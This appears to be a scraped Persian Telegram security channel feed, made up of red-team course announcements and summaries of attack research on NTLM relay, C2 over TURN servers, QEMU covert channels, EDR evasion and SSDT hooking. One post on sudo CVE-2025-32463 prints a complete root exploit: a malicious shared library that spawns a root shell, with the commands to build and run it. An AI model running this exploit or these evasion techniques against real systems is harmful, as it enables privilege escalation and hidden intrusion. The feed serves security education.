Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#DEMO #OFEN
در این ویدیو، که دموی درس ۶۸ از فصل دوم "دورهی برنامهنویسی تهاجمی است"، در بخش اول به کدنویسی روشهای مختلف شناسایی نمونهی جدید (Instance) از یک برنامه پرداختیم. سپس در بخش دوم، با مهندسی معکوس نرمافزار OBS Studio بررسی کردیم که این برنامه از چه مکانیزمی برای شناسایی اجرای نمونههای (Instance) جدید استفاده میکند و در ادامه، همان روش را در پروژهی خودمان پیادهسازی کردیم.
🦅 کانال بایت امن | گروه بایت امن
_
در این ویدیو، که دموی درس ۶۸ از فصل دوم "دورهی برنامهنویسی تهاجمی است"، در بخش اول به کدنویسی روشهای مختلف شناسایی نمونهی جدید (Instance) از یک برنامه پرداختیم. سپس در بخش دوم، با مهندسی معکوس نرمافزار OBS Studio بررسی کردیم که این برنامه از چه مکانیزمی برای شناسایی اجرای نمونههای (Instance) جدید استفاده میکند و در ادامه، همان روش را در پروژهی خودمان پیادهسازی کردیم.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
ویدیو ی دموی جلسه 75 از "دوره برنامه نویسی تهاجمی مختص به تیم قرمز"
در این ویدیو، به صورت قدم به قدم وارد دنیای ساختار های داخلی ویندوز شدیم و بررسی کردیم که چگونه میتوان بدون وابستگی به API های معمول، به لیست ماژول های لود شده در یک پروسه دسترسی پیدا کرد. این تکنیک نه تنها در توسعه ابزارهای سطح پایین یا امنیتی بسیار کاربردی است، بلکه در موقعیتهایی که نیاز به پنهان کاری، تحلیل عمیق، یا بایپس کردن ابزار های امنیتی داریم، اهمیت ویژه ای پیدا میکند.
⬅️ بررسی گام به گام دسترسی به لیست ماژول ها از طریق ساختار PEB
⬅️ آشنایی دقیق با ساختارهای PEB_LDR_DATA، LDR_DATA_TABLE_ENTRY و LIST_ENTRY
⬅️ درک دقیق از مفهوم لیست پیوندی دو طرفه (Doubly-Linked List) و اهمیت آن در لیست کردن ماژول ها
⬅️ نکات مهم و حساس هنگام پیمایش لیست ماژولها از طریق PEB، بدون استفاده از API های کلاسیک مثل EnumProcessModules - GetModuleHandle - LoadLibrary و GetProcAddress
🦅 کانال بایت امن | گروه بایت امن
_
در این ویدیو، به صورت قدم به قدم وارد دنیای ساختار های داخلی ویندوز شدیم و بررسی کردیم که چگونه میتوان بدون وابستگی به API های معمول، به لیست ماژول های لود شده در یک پروسه دسترسی پیدا کرد. این تکنیک نه تنها در توسعه ابزارهای سطح پایین یا امنیتی بسیار کاربردی است، بلکه در موقعیتهایی که نیاز به پنهان کاری، تحلیل عمیق، یا بایپس کردن ابزار های امنیتی داریم، اهمیت ویژه ای پیدا میکند.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
#Article #Tools
چند مقاله و ابزار درباره ساختار PE قبلاً در وبلاگ قرار داده بودم که امروز اونها رو بهروزرسانی کردم. سورسکدها و ویدیوهای دمو هم اضافه شده تا این مفاهیم بهتر قابل درک باشن و راحتتر بتونید با موضوع ساختار PE ارتباط برقرار کنید.
⬅️ بررسی و تحلیل Checksum در ساختار PE
⬅️ بررسی و تشریح DEP و ASLR در ساختار PE
⬅️ ابزار تبدیل DLL به EXE
⬅️ ابزار حذف DEP و ASLR از ساختار PE
⬅️ ابزار تصحیح Checksum در ساختار PE
🦅 کانال بایت امن | گروه بایت امن
_
چند مقاله و ابزار درباره ساختار PE قبلاً در وبلاگ قرار داده بودم که امروز اونها رو بهروزرسانی کردم. سورسکدها و ویدیوهای دمو هم اضافه شده تا این مفاهیم بهتر قابل درک باشن و راحتتر بتونید با موضوع ساختار PE ارتباط برقرار کنید.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
#DWORD
دوره چالش های مهندسی معکوس سطح 1 در لیست دوره های آکادمی قرار گرفت
این دوره رایگان، فرصتی است برای ورود عملی به دنیای مهندسی معکوس و حل چالشهای واقعی در حوزه تحلیل باینری. در طول دوره، به سراغ مجموعهای از چالشهای منتخب از مسابقات بینالمللی CTF میرویم.
این چالشها از رقابتهایی مانند Flare-On یکی از معتبرترین و شناختهشدهترین مسابقات مهندسی معکوس برگرفته شدهاند.
🦅 کانال بایت امن | گروه بایت امن
_
دوره چالش های مهندسی معکوس سطح 1 در لیست دوره های آکادمی قرار گرفت
این دوره رایگان، فرصتی است برای ورود عملی به دنیای مهندسی معکوس و حل چالشهای واقعی در حوزه تحلیل باینری. در طول دوره، به سراغ مجموعهای از چالشهای منتخب از مسابقات بینالمللی CTF میرویم.
این چالشها از رقابتهایی مانند Flare-On یکی از معتبرترین و شناختهشدهترین مسابقات مهندسی معکوس برگرفته شدهاند.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ FridaScriptGen
این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن میکند و سپس به طور خودکار اسکریپتهای Frida را برای دور زدن این بررسیهای امنیتی ایجاد میکند.
📎 GitHub
@Securation
#Android #Frida
این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن میکند و سپس به طور خودکار اسکریپتهای Frida را برای دور زدن این بررسیهای امنیتی ایجاد میکند.
📎 GitHub
@Securation
#Android #Frida
❤1
⭕️ Frida Launcher 🚀
سرور Frida را به راحتی و تنها با یک لمس، روی دستگاههای اندروید و شبیهسازها مدیریت کنید!
📎 GitHub
@Securation
#Android #Frida
سرور Frida را به راحتی و تنها با یک لمس، روی دستگاههای اندروید و شبیهسازها مدیریت کنید!
📎 GitHub
@Securation
#Android #Frida
⭕️ اخیرا آسیب پذیریجدیدی از نوع LPE اخیرا با شناسه CVE-2025-32463 منتشر شده. این آسیبپذیری در صورتی فعال میشود که از پارامتر --Chroot استفاده شده و مسیر nsswitch.conf به صورت دستی کنترل شود.
به طوری که اگر در پیکربندی route از pass: unix:/path/to/socket استفاده شده باشد و پارامتر Share تنظیم نشده باشد، Sudo قبل از بارگذاری sudoers، فایل nsswitch.conf را از محیط chroot می خواند.
این یعنی مهاجم توانایی قرار دادن فایل تقلبی و یک shared object مخرب، اجرای کد به عنوان root انجام دهد بدون نیاز به اینکه در فایل sudoers ثبت شده باشد.
مراحل مربوط به رسیدن به سطح دسترسی مورد نیاز:
ساخت دایرکتوری chroot و فایلهای موردنیاز
نوشتن shared library مخرب
کامپایل shared library
اجرای اکسپلویت
#RedTeam #LPE #EXP
@securation
به طوری که اگر در پیکربندی route از pass: unix:/path/to/socket استفاده شده باشد و پارامتر Share تنظیم نشده باشد، Sudo قبل از بارگذاری sudoers، فایل nsswitch.conf را از محیط chroot می خواند.
این یعنی مهاجم توانایی قرار دادن فایل تقلبی و یک shared object مخرب، اجرای کد به عنوان root انجام دهد بدون نیاز به اینکه در فایل sudoers ثبت شده باشد.
مراحل مربوط به رسیدن به سطح دسترسی مورد نیاز:
ساخت دایرکتوری chroot و فایلهای موردنیاز
mkdir -p /tmp/pwnroot/etc
mkdir -p /tmp/pwnroot/lib
نوشتن shared library مخرب
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
__attribute__((constructor)) void pwn() {
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/bash");
}
کامپایل shared library
gcc -fPIC -shared -o libnss_myexploit.so.2 myexploit.c
اجرای اکسپلویت
sudo -R /tmp/pwnroot id
#RedTeam #LPE #EXP
@securation
⭕️ مرکز فابا کجاست؟
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.
مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.
با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟
احتمالا پکت هایی که ارسال میشه هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.
#دستشوییهای_سایبری
@securation
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.
مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.
با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟
احتمالا پکت هایی که ارسال میشه هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.
#دستشوییهای_سایبری
@securation
😁2
Forwarded from کانال بایت امن
#DWORD
بازنویسی کد با رویکرد مهندسی معکوس
دوره رایگان و تخصصی آکادمی DWORD
در این دوره تخصصی، با تمرکز بر مهندسی معکوس توابع کلیدی نرمافزارها و کتابخانهها، به شما آموزش میدهیم چگونه منطق توابع را تحلیل، ایزوله و بازنویسی کنید.
این فرآیند مشابه روش fuzzing است که در آن، با ساختن یک harness، تابع هدف را با ورودیهای مختلف آزمایش میکنیم تا رفتار و مسیرهای منطقی آن را کشف کنیم.
با گذراندن این دوره، مهارتهای لازم برای:
⬅️ درک دقیق ورودیها و خروجیهای توابع
⬅️ تحلیل رفتار و مسیرهای منطقی
⬅️ بازنویسی توابع به صورت خوانا و مستند
را کسب خواهید کرد تا بتوانید مثل یک تحلیلگر امنیتی حرفهای یا توسعهدهنده ابزارهای امنیتی عمل کنید.
🦅 کانال بایت امن | گروه بایت امن
_
بازنویسی کد با رویکرد مهندسی معکوس
دوره رایگان و تخصصی آکادمی DWORD
در این دوره تخصصی، با تمرکز بر مهندسی معکوس توابع کلیدی نرمافزارها و کتابخانهها، به شما آموزش میدهیم چگونه منطق توابع را تحلیل، ایزوله و بازنویسی کنید.
این فرآیند مشابه روش fuzzing است که در آن، با ساختن یک harness، تابع هدف را با ورودیهای مختلف آزمایش میکنیم تا رفتار و مسیرهای منطقی آن را کشف کنیم.
با گذراندن این دوره، مهارتهای لازم برای:
را کسب خواهید کرد تا بتوانید مثل یک تحلیلگر امنیتی حرفهای یا توسعهدهنده ابزارهای امنیتی عمل کنید.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ امنیت CI/CD رو امشب در خدمتتون هستیم:
🕘 ساعت ۹
💡روشهای نفوذ از طریق CI/CD
💡دسترسی به سرورهای تست و پروداکشن
💡دسترسی به SECRETها
💡اصول امن سازی و توسعه امن نرم افزار
meet.google.com/rdr-cutu-qwd
#CICD #Security
@securation
🕘 ساعت ۹
💡روشهای نفوذ از طریق CI/CD
💡دسترسی به سرورهای تست و پروداکشن
💡دسترسی به SECRETها
💡اصول امن سازی و توسعه امن نرم افزار
meet.google.com/rdr-cutu-qwd
#CICD #Security
@securation
⭕️ اخیرا مقاله ای از TrustedSec نوشته شده که روشی هوشمندانه به جهت ایجاد Covert Channel بین Guest و Host از طریق QEMU Virtualization بدون نیاز به NIC یا ارتباط TCP/IP ارایه شده است.
مهاجم با سوءاستفاده از VirtIO queues، Shared memory یا I/O emulation hooks دادههایی رو منتقل میکند که در سطح Network stack قابل تشخیص نیستند. این تکنیک میتواند از QEMU های Patch شده یا حتی از قابلیتهای Native مثل Virtio-serial برای ارسال داده بین Host و Guest استفاده کند.
به طوری که QEMU بهعنوان یک Hypervisor اجازهی انتقال داده بین Host و Guest رو از طریق Shared memory, Virtio devices یا Custom I/O Handlers میدهد. این مسیرها میتوانند بدون اینکه بستهای در شبکه واقعی رد و بدل بشود، اطلاعات حمل کنند.
و از Chardev, -Device virtserialport برای ساخت یک Pipe-like interface بین Host و Guest استفاده میشود. که امکان ایجاد Shell خود از طریق این interface روی Guest قرار دهد و روی Host listener بنویسد که دادهها رو پردازش کند.
و البته QEMU دارای دستورات داخلی مانند QEMU-ga، Guest-set-time, Guest-exec هست که برای مدیریت VM طراحی شدن، ولی میتواند بهعنوان ابزار انتقال داده پنهان استفاده شود.
#RedTeam #C2 #Exfiltration
@securation
مهاجم با سوءاستفاده از VirtIO queues، Shared memory یا I/O emulation hooks دادههایی رو منتقل میکند که در سطح Network stack قابل تشخیص نیستند. این تکنیک میتواند از QEMU های Patch شده یا حتی از قابلیتهای Native مثل Virtio-serial برای ارسال داده بین Host و Guest استفاده کند.
به طوری که QEMU بهعنوان یک Hypervisor اجازهی انتقال داده بین Host و Guest رو از طریق Shared memory, Virtio devices یا Custom I/O Handlers میدهد. این مسیرها میتوانند بدون اینکه بستهای در شبکه واقعی رد و بدل بشود، اطلاعات حمل کنند.
و از Chardev, -Device virtserialport برای ساخت یک Pipe-like interface بین Host و Guest استفاده میشود. که امکان ایجاد Shell خود از طریق این interface روی Guest قرار دهد و روی Host listener بنویسد که دادهها رو پردازش کند.
و البته QEMU دارای دستورات داخلی مانند QEMU-ga، Guest-set-time, Guest-exec هست که برای مدیریت VM طراحی شدن، ولی میتواند بهعنوان ابزار انتقال داده پنهان استفاده شود.
#RedTeam #C2 #Exfiltration
@securation
TrustedSec
Hiding in the Shadows: Covert Tunnels via QEMU Virtualization
🔥1
Forwarded from OS Internals (Abolfazl Kazemi)
🔍 قابل توجه علاقهمندان به امنیت سیستمعامل و توسعه اکسپلویت در لینوکس
من همیشه به تدریس علاقهمند بودهام؛ نه صرفاً آموزش تئوری، بلکه انتقال واقعی تجربهها و درک عمیق مفاهیم فنی. از سالها پیش، تمرکزم روی internal سیستمعاملها—بهویژه ویندوز و لینوکس—و مباحث امنیتی بوده و سعی کردهام این مطالب تخصصی را به زبانی ساده، کاربردی و قابلفهم برای دیگران ارائه دهم.
🎓 حالا نوبت یک قدم جدید و متفاوت رسیده:
«دورهی Exploit Development در لینوکس»
از تحلیل آسیبپذیری واقعی گرفته تا نوشتن اکسپلویتهای عملی و کاربردی.
اما تصمیم گرفتم یک شرط خاص برای انتشار این دوره بگذارم:
🎯 اگر اعضای کانالم به ۵۰۰۰ نفر برسند، دوره را به صورت کامل و رایگان منتشر میکنم.
بیش از ۲۰ ساعت ویدئو و تمرین عملی بدون تبلیغات، بدون پرداخت هزینه—صرفاً برای اینکه دانش تخصصی، راحتتر و بیواسطه به دست کسانی برسه که واقعاً به یادگیری اهمیت میدن.
🧠 اگر شما هم به این مسیر علاقهمندید یا فکر میکنید افراد دیگری در اطرافتان هستند که این محتوا به دردشان میخورد، خوشحال میشم با معرفی کانالم به دوستانتان از این پروژه حمایت کنید.
📎 لینک کانال:
https://news.1rj.ru/str/OxAA55
✍️راستی سرفصل دوره رو هم میتونید در لینک زیر مشاهده کنید:
https://news.1rj.ru/str/OxAA55/140
من همیشه به تدریس علاقهمند بودهام؛ نه صرفاً آموزش تئوری، بلکه انتقال واقعی تجربهها و درک عمیق مفاهیم فنی. از سالها پیش، تمرکزم روی internal سیستمعاملها—بهویژه ویندوز و لینوکس—و مباحث امنیتی بوده و سعی کردهام این مطالب تخصصی را به زبانی ساده، کاربردی و قابلفهم برای دیگران ارائه دهم.
🎓 حالا نوبت یک قدم جدید و متفاوت رسیده:
«دورهی Exploit Development در لینوکس»
از تحلیل آسیبپذیری واقعی گرفته تا نوشتن اکسپلویتهای عملی و کاربردی.
اما تصمیم گرفتم یک شرط خاص برای انتشار این دوره بگذارم:
🎯 اگر اعضای کانالم به ۵۰۰۰ نفر برسند، دوره را به صورت کامل و رایگان منتشر میکنم.
بیش از ۲۰ ساعت ویدئو و تمرین عملی بدون تبلیغات، بدون پرداخت هزینه—صرفاً برای اینکه دانش تخصصی، راحتتر و بیواسطه به دست کسانی برسه که واقعاً به یادگیری اهمیت میدن.
🧠 اگر شما هم به این مسیر علاقهمندید یا فکر میکنید افراد دیگری در اطرافتان هستند که این محتوا به دردشان میخورد، خوشحال میشم با معرفی کانالم به دوستانتان از این پروژه حمایت کنید.
📎 لینک کانال:
https://news.1rj.ru/str/OxAA55
✍️راستی سرفصل دوره رو هم میتونید در لینک زیر مشاهده کنید:
https://news.1rj.ru/str/OxAA55/140
Telegram
OS Internals
مقاله و فیلم آموزش مدیریت و برنامهنویسی سیستمهای عامل، شبکه و امنیت اطلاعات.
مقالات من در ویرگول:
https://virgool.io/@akazemi
ویدئوهای کانال در آپارات:
https://www.aparat.com/oxaa55
ارتباط با مدیر کانال از طریق:
@akazemi67
مقالات من در ویرگول:
https://virgool.io/@akazemi
ویدئوهای کانال در آپارات:
https://www.aparat.com/oxaa55
ارتباط با مدیر کانال از طریق:
@akazemi67
⭕️ یعنی آدم انقدر نوب باشه فکر کنه هک شدن نوبیتکس بخاطر این یوزر پسورد هایی باشه که استیلر ها قبلا به فروش گذاشتن؟
شما شرکت یا سازمانتون white list برای متصل شدن نداره ؟
شما سازمانتون 2fa نداره که حتی با داشتن یوزر پسورد احراز هویت لاگین موفق بزنه؟
شما سازمانتون VPN نداره برای وصل شدن و لاگین شدن به یک سامانه ؟
برخی عزیزان رو لینکدین و تلگرام میبینیم تحلیلهای حاکر بازی که برای خریدن توجه دارند ادعا میکنند یوزر پسورد چندکاربر قدیمی باعث نفوذ شده ، که البته بجز اینکه این یوزرها هیچ نقش در اتفاقات اخیر نداشته اند، بلکه نشون داد شما حتی دانش پایه امنیت شبکه و دانش بلاکچین و دانش امنیت وب و هیچ گونه علمی درمورد Zero trust هایی که اعمال میشه ندارید.
خرید جلب توجه با شایعه پراکنی های غیرفنی و غیرعلمی فقط نشون میده نوب بودن و سطحی بودن شما با پر کردن پروفایل های لینکدین از واژه های هکر و محقق در همین حد هست.
یه سایت هستی با user : password منقرض شده ی کاربر لاگین کنید هم مدیریت کل سرورها و کیف پول ها حتی بصورت فیزیکال دستته و هم میتونید با یک دکمه چند میلیون دلار پول رو انتقال بدید 🙏
@securation
شما شرکت یا سازمانتون white list برای متصل شدن نداره ؟
شما سازمانتون 2fa نداره که حتی با داشتن یوزر پسورد احراز هویت لاگین موفق بزنه؟
شما سازمانتون VPN نداره برای وصل شدن و لاگین شدن به یک سامانه ؟
برخی عزیزان رو لینکدین و تلگرام میبینیم تحلیلهای حاکر بازی که برای خریدن توجه دارند ادعا میکنند یوزر پسورد چندکاربر قدیمی باعث نفوذ شده ، که البته بجز اینکه این یوزرها هیچ نقش در اتفاقات اخیر نداشته اند، بلکه نشون داد شما حتی دانش پایه امنیت شبکه و دانش بلاکچین و دانش امنیت وب و هیچ گونه علمی درمورد Zero trust هایی که اعمال میشه ندارید.
خرید جلب توجه با شایعه پراکنی های غیرفنی و غیرعلمی فقط نشون میده نوب بودن و سطحی بودن شما با پر کردن پروفایل های لینکدین از واژه های هکر و محقق در همین حد هست.
یه سایت هستی با user : password منقرض شده ی کاربر لاگین کنید هم مدیریت کل سرورها و کیف پول ها حتی بصورت فیزیکال دستته و هم میتونید با یک دکمه چند میلیون دلار پول رو انتقال بدید 🙏
@securation
🔥1
⭕️ حمله NTLM Relay بر بستر SMB (پورت 445) سالهاست که در عملیاتهای Red Team جایگاه دارد، اما همواره با یک محدودیت جدی همراه بوده گیر افتادن در چارچوب پروتکل SMB و عدم امکان استفاده از ابزارهای قدرتمندتر مانند WMI، WinRM یا حتی RDP. از سوی دیگر، هر تلاش برای dump گرفتن از هشها یا اجرای shell، با ریسک بالا و احتمال شناسایی توسط EDR همراه است.
تیم SpecterOps در مقالهای با عنوان «Escaping the Confines of Port 445» نگاهی نو به این چالش دارد
بهجای تلاش برای باز کردن پورتهای بیشتر، از همان SMB بیشترین بهره را ببریم.
استفاده از پراکسی ntlmrelayx --socks برای ایجاد یک tunnel امن و دائمی بر بستر SMB.
بهجای ابزارهای نویزی، از ابزارهای native ویندوز مثل sc.exe برای کنترل سرویسها استفاده میشود
بدون ایجاد آلارم در EDR.
سپس سرویس WebClient روی سیستم هدف فعال میشود.
فعال شدن WebClient منجر به ارسال درخواست WebDAV به سرور ما میشود؛ که حالا میتوان آن را به LDAP یا LDAPS روی Domain Controller رله کرد.
از این نقطه به بعد، مسیر برای حملاتی مانند Shadow Credentials یا RBCD باز است حتی بدون نیاز به پورتهای اضافی یا استخراج هش.
#RedTeam #AD #NTLMRELAY
@securation
تیم SpecterOps در مقالهای با عنوان «Escaping the Confines of Port 445» نگاهی نو به این چالش دارد
بهجای تلاش برای باز کردن پورتهای بیشتر، از همان SMB بیشترین بهره را ببریم.
استفاده از پراکسی ntlmrelayx --socks برای ایجاد یک tunnel امن و دائمی بر بستر SMB.
بهجای ابزارهای نویزی، از ابزارهای native ویندوز مثل sc.exe برای کنترل سرویسها استفاده میشود
بدون ایجاد آلارم در EDR.
سپس سرویس WebClient روی سیستم هدف فعال میشود.
فعال شدن WebClient منجر به ارسال درخواست WebDAV به سرور ما میشود؛ که حالا میتوان آن را به LDAP یا LDAPS روی Domain Controller رله کرد.
از این نقطه به بعد، مسیر برای حملاتی مانند Shadow Credentials یا RBCD باز است حتی بدون نیاز به پورتهای اضافی یا استخراج هش.
#RedTeam #AD #NTLMRELAY
@securation
SpecterOps
Escaping the Confines of Port 445 - SpecterOps
NTLM relay attacks targeting SMB restrict lateral movement options to those that solely require port 445/TCP. Learn at least one method of overcoming this restriction to enable additional lateral movement options in this blog!
❤1
⭕️ تلویزیون های اسنوا دچار اختلال و قطعی کامل شده اند و هنوز مشخص نیست بخاطر آپدیت نبودن دیوایس هست یا فریمور مشکل پیدا کرده یا هک شده اند.
فعلا بصورت انلاین هیچکونه تعمیر/تغییر نرم افزاری برای این تلویزیون ها وجود ندارد.
باید منتظر اطلاعیه ی شرکت اسنوا باشیم.
#IOT
@securation
فعلا بصورت انلاین هیچکونه تعمیر/تغییر نرم افزاری برای این تلویزیون ها وجود ندارد.
باید منتظر اطلاعیه ی شرکت اسنوا باشیم.
#IOT
@securation
Forwarded from کانال بایت امن
#Article
Hells Hollow: A new SSDT Hooking technique
در پست قبلی دربارهی تکنیکهای AltSyscall صحبت کردم. امروز در ادامهی همون موضوع، قصد دارم یک تکنیک جدید با نام غیررسمی Hell's Hollow رو معرفی کنم.
این تکنیک با تکیه بر قابلیتهای AltSys و انجام تغییراتی روی ساختار حساس KTRAP_FRAME، امکان Hook کردن SSDT رو به شکلی متفاوت فراهم میکنه. یعنی به جای دستکاری کپیهایی از Trap Frame، این بار مستقیماً سراغ نسخهی واقعی اون میریم. نتیجهی این کار، توانایی در کنترل و تغییر مسیر تمام System Callها در سطح بسیار پایین و حساس سیستمعامله.
POC Link : Hell's Hollow is a Windows 11 compatible rootkit technique that is equivalent to a modern (PatchGuard and HyperGuard) resistant technique to effectively perform SSDT Hooking (System Service Dispatch Table) - bypassing all previous defence mechanisms put in the kernel.
🦅 کانال بایت امن | گروه بایت امن
_
Hells Hollow: A new SSDT Hooking technique
در پست قبلی دربارهی تکنیکهای AltSyscall صحبت کردم. امروز در ادامهی همون موضوع، قصد دارم یک تکنیک جدید با نام غیررسمی Hell's Hollow رو معرفی کنم.
این تکنیک با تکیه بر قابلیتهای AltSys و انجام تغییراتی روی ساختار حساس KTRAP_FRAME، امکان Hook کردن SSDT رو به شکلی متفاوت فراهم میکنه. یعنی به جای دستکاری کپیهایی از Trap Frame، این بار مستقیماً سراغ نسخهی واقعی اون میریم. نتیجهی این کار، توانایی در کنترل و تغییر مسیر تمام System Callها در سطح بسیار پایین و حساس سیستمعامله.
POC Link : Hell's Hollow is a Windows 11 compatible rootkit technique that is equivalent to a modern (PatchGuard and HyperGuard) resistant technique to effectively perform SSDT Hooking (System Service Dispatch Table) - bypassing all previous defence mechanisms put in the kernel.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
⭕️ جدیدترین گزارش تحقیقاتی تیم Assetnote در Searchlight Cyber، اقدام به بررسی آسیبپذیری Abusing Windows/.NET quirks and Unicode Normalization در DNN (نسخههای ۶.۰.۰ تا پیش از ۱۰.۰.۱) کرده است
بررسیهای فنی نشان میدهد که با استفاده از کاراکترهای Unicode full‑width مانند U+FF0E و U+FF3C، میتوان مسیرهای فریبدهنده را طوری ساخت که پس از نرمالسازی تبدیل به UNC path شوند: \attacker .com\share.jpg. اندپوینتهای متداول مانند File.Exists یا WebClient بدون احراز هویت، باعث ارسال hash های NTLM به سرور مهاجم میشوند که باعث یک حمله Credential Leakage بدون دخالت کاربر می شود.
نکات کلیدی:
توصیه برای تیمهای امنیت:
#RedTeam #DNN #NTLM
@securation
بررسیهای فنی نشان میدهد که با استفاده از کاراکترهای Unicode full‑width مانند U+FF0E و U+FF3C، میتوان مسیرهای فریبدهنده را طوری ساخت که پس از نرمالسازی تبدیل به UNC path شوند: \attacker .com\share.jpg. اندپوینتهای متداول مانند File.Exists یا WebClient بدون احراز هویت، باعث ارسال hash های NTLM به سرور مهاجم میشوند که باعث یک حمله Credential Leakage بدون دخالت کاربر می شود.
نکات کلیدی:
• آسیبپذیری pre-auth بوده و نیازی به login ندارد
• CVSS نمره 8.6، مخاطره بالا
• ترکیب ضعفهای Path.Combine و Unicode normalization bypass باعث وقوع این آسیبپذیری شده است
توصیه برای تیمهای امنیت:
فوراً DNN را به نسخه ۱۰.۰.۱ یا جدیدتر آپدیت کنید
از ارسال ترافیک های SMB خروجی خودداری و آنها را ببندید
توسعهدهندگان باید ترتیب sanitize → normalize → validate را رعایت کنند
#RedTeam #DNN #NTLM
@securation
Searchlight Cyber
Abusing .NET and Unicode Normalization to Exploit DNN | Searchlight
A pre-authentication vulnerability exists within DotNetNuke versions 6.0 to 10.0.1, assigned CVE-2025-52488, that allows attackers to steal NTLM hashes.
❤2👏1
⭕️ در تحلیل تکنیک Ghost Calls یک روش فرمان و کنترل (C2) را آشکار میسازد که با سوءاستفاده از طراحی ذاتی پروتکل TURN در پلتفرمهای WebRTC مانند Zoom و Microsoft Teams عمل میکند.
مکانیسم اصلی شامل برقراری ارتباط سرور TURN با TTL بسیار طولانی از یک جلسه کنفرانس (حتی با حضور چند ثانیهای) و سپس استفاده ناهمزمان از آنها برای ایجاد یک رله داده دوطرفه از طریق زیرساخت جهانی و مورد اعتماد همین سرویسدهندگان است. این کانال ارتباطی با تونلسازی ترافیک خود از طریق TURNS بر روی پورت TCP/443، به شکلی موثر از فیلترینگ شبکه عبور کرده و به دلیل رویه رایج معاف کردن دامنههایی مانند *.zoom.us از بازرسی TLS، عملاً ترافیک C2 را در یک تونل رمزنگاریشده و کاملاً پنهان مخفی میکند.
https://github.com/praetorian-inc/turnt
https://www.praetorian.com/blog/ghost-calls-abusing-web-conferencing-for-covert-command-control-part-1-of-2/
https://www.praetorian.com/blog/ghost-calls-abusing-web-conferencing-for-covert-command-control-part-2-of-2/
#RedTeam #C2
@securation
مکانیسم اصلی شامل برقراری ارتباط سرور TURN با TTL بسیار طولانی از یک جلسه کنفرانس (حتی با حضور چند ثانیهای) و سپس استفاده ناهمزمان از آنها برای ایجاد یک رله داده دوطرفه از طریق زیرساخت جهانی و مورد اعتماد همین سرویسدهندگان است. این کانال ارتباطی با تونلسازی ترافیک خود از طریق TURNS بر روی پورت TCP/443، به شکلی موثر از فیلترینگ شبکه عبور کرده و به دلیل رویه رایج معاف کردن دامنههایی مانند *.zoom.us از بازرسی TLS، عملاً ترافیک C2 را در یک تونل رمزنگاریشده و کاملاً پنهان مخفی میکند.
https://github.com/praetorian-inc/turnt
https://www.praetorian.com/blog/ghost-calls-abusing-web-conferencing-for-covert-command-control-part-1-of-2/
https://www.praetorian.com/blog/ghost-calls-abusing-web-conferencing-for-covert-command-control-part-2-of-2/
#RedTeam #C2
@securation
GitHub
Conferences/BlackHat_USA_2025_Slides/Adam Crosser_Ghost Calls Abusing Web Conferencing for Covert Command & Control.pdf at main…
Conference presentation slides. Contribute to onhexgroup/Conferences development by creating an account on GitHub.
2🔥8
⭕️ بر اساس ارائه فنی Death by Noise از Rex Guo و Khang Nguyen در کنفرانس Black Hat، مهاجمان از یک استراتژی هوشمندانه برای دور زدن EDR ها از طریق سوءاستفاده از فرآیندهای انسانی SOC بهره میبرند. به جای تلاش برای پنهانکاری کامل (Stealth)، آنها عمداً با اجرای تکنیکهایی که مجموعهای از هشدارهای با شدت پایین و متوسط (Low/Medium Severity) تولید میکنند، خود را در سیل عظیم هشدارهای روزانه غرق میکنند. این رویکرد مستقیماً پدیده خستگی از هشدار (Alert Fatigue) را هدف قرار میدهد؛ جایی که تحلیلگران به دلیل نرخ بالای مثبت کاذب، به ناچار هشدارهای به ظاهر کمخطر را نادیده گرفته یا به صورت سطحی بررسی میکنند.
این تکنیک به طور خاص ضعف اتکا به تنظیمات پیشفرض EDR را برجسته میکند و نشان میدهد که چگونه فعالیتهای مخرب میتوانند به عنوان نویز پسزمینه از دیدهها پنهان بمانند. برای مقابله، تیمهای امنیتی باید فراتر از قواعد پیشفرض عمل کنند و بر روی ایجاد هشدارهای باکیفیت و غنی از محتوا (High-Fidelity) تمرکز کنند. تیمهای قرمز نیز باید این متدولوژی تولید نویز هدفمند را به عنوان یک TTP معتبر در ارزیابیهای خود بگنجانند تا مقاومت واقعی SOC در برابر حملات پنهانکارانه و چندمرحلهای را بسنجند.
#RedTeam #EDR #Evasion
@securation
این تکنیک به طور خاص ضعف اتکا به تنظیمات پیشفرض EDR را برجسته میکند و نشان میدهد که چگونه فعالیتهای مخرب میتوانند به عنوان نویز پسزمینه از دیدهها پنهان بمانند. برای مقابله، تیمهای امنیتی باید فراتر از قواعد پیشفرض عمل کنند و بر روی ایجاد هشدارهای باکیفیت و غنی از محتوا (High-Fidelity) تمرکز کنند. تیمهای قرمز نیز باید این متدولوژی تولید نویز هدفمند را به عنوان یک TTP معتبر در ارزیابیهای خود بگنجانند تا مقاومت واقعی SOC در برابر حملات پنهانکارانه و چندمرحلهای را بسنجند.
#RedTeam #EDR #Evasion
@securation
GitHub
